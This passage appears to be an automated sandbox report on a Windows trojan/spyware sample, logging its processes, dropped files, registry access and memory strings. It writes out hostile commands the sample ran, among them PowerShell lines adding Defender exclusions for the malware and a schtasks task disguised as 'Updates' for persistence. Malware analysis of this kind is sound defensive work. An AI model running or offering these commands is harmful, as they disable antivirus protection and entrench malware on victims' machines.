            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_0041E173 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_004014E9 NtProtectVirtualMemory,
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.359675878.0000000002E71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePrecision.dll6 vs SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.359675878.0000000002E71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameInspector.dllN vs SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000000.308286342.0000000000A42000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamenXwV.exeB vs SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.366984387.0000000007650000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCollins.dll8 vs SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000003.360162279.0000000001A69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000003.357988306.00000000018BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000002.362197036.0000000001BFF000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeBinary or memory string: OriginalFilenamenXwV.exeB vs SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: FqJXaFxwEj.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeReversingLabs: Detection: 29%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeJump to behavior
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FqJXaFxwEj" /XML "C:\Users\user\AppData\Local\Temp\tmp4724.tmp
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FqJXaFxwEj" /XML "C:\Users\user\AppData\Local\Temp\tmp8C7A.tmp
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess created: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess created: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FqJXaFxwEj" /XML "C:\Users\user\AppData\Local\Temp\tmp4724.tmp
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FqJXaFxwEj" /XML "C:\Users\user\AppData\Local\Temp\tmp8C7A.tmp
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess created: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess created: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeFile created: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeFile created: C:\Users\user\AppData\Local\Temp\tmp4724.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/12@2/1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000000.308136610.0000000000962000.00000002.00000001.01000000.00000003.sdmp, FqJXaFxwEj.exe.0.drBinary or memory string: insert into User_Transportation(UserID,TransportationID) values (@UserID,@TransID);
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000000.308136610.0000000000962000.00000002.00000001.01000000.00000003.sdmp, FqJXaFxwEj.exe.0.drBinary or memory string: insert into TourPlace(Name,Location,TicketPrice) values (@name,@location,@ticket);
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000000.308136610.0000000000962000.00000002.00000001.01000000.00000003.sdmp, FqJXaFxwEj.exe.0.drBinary or memory string: insert into User_TourPlace(UserID,TourPlaceID) values (@UserID,@TourplaceID);
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5212:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1028:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3216:120:WilError_01
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeMutant created: \Sessions\1\BaseNamedObjects\FgAniyuUJLIlHUpU
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5072:120:WilError_01
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeString found in binary or memory: AddUserButton'AddUserPhoneTextbox'AdduserEmailtextbox-Adduserpasswordtextbox
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeString found in binary or memory: Username:-AddusertextBoxUsernameCash
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\cmd.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000003.359410400.000000000194A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000002.361323624.0000000001AE0000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000003.355211610.00000000017A7000.00000004.00000800.00020000.00000000.sdmp, FqJXaFxwEj.exe, 0000000D.00000002.501948554.0000000001950000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.504620671.0000000003588000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.578060777.0000000003720000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.501310955.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.581625002.000000000383F000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000003.359410400.000000000194A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000002.361323624.0000000001AE0000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000003.355211610.00000000017A7000.00000004.00000800.00020000.00000000.sdmp, FqJXaFxwEj.exe, 0000000D.00000002.501948554.0000000001950000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.504620671.0000000003588000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.578060777.0000000003720000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.501310955.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.581625002.000000000383F000.00000040.00000800.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 0_2_02E3F401 push ecx; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 0_2_053571C1 push esp; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B5D0D1 push ecx; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_0040588C push 00000021h; retf
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_004229DB push ebx; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_004212CC push eax; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_00421319 push eax; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_00421322 push eax; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_00421383 push eax; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_00409C01 push eax; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_00422C0F push dword ptr [B99DF5C4h]; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_0041AD57 push ebp; iretd
            Source: initial sampleStatic PE information: section name: .text entropy: 7.644411619658559
            Source: initial sampleStatic PE information: section name: .text entropy: 7.644411619658559
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeFile created: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FqJXaFxwEj" /XML "C:\Users\user\AppData\Local\Temp\tmp4724.tmp
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
